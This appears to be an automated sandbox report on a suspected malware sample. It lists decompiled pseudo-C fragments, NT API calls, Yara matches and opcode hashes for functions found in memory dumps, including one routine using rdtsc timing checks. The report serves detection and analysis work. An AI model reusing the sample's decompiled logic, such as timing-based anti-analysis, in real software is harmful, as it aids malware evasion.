                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                        0x0041a54f
                                                        0x0041a557
                                                        0x0041a579
                                                        0x0041a57d

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                        • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                        • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A490, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                        • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                        • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B400C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B40078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                        • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                        • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                        • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B40048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                        • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                        • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                        • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                        • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                        • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                        • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                        • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                        • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                        • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B3FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00409AB0, Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E00409AB0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BE10( &_v284, 0x104);
						E0041C480( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                        0x00409abb
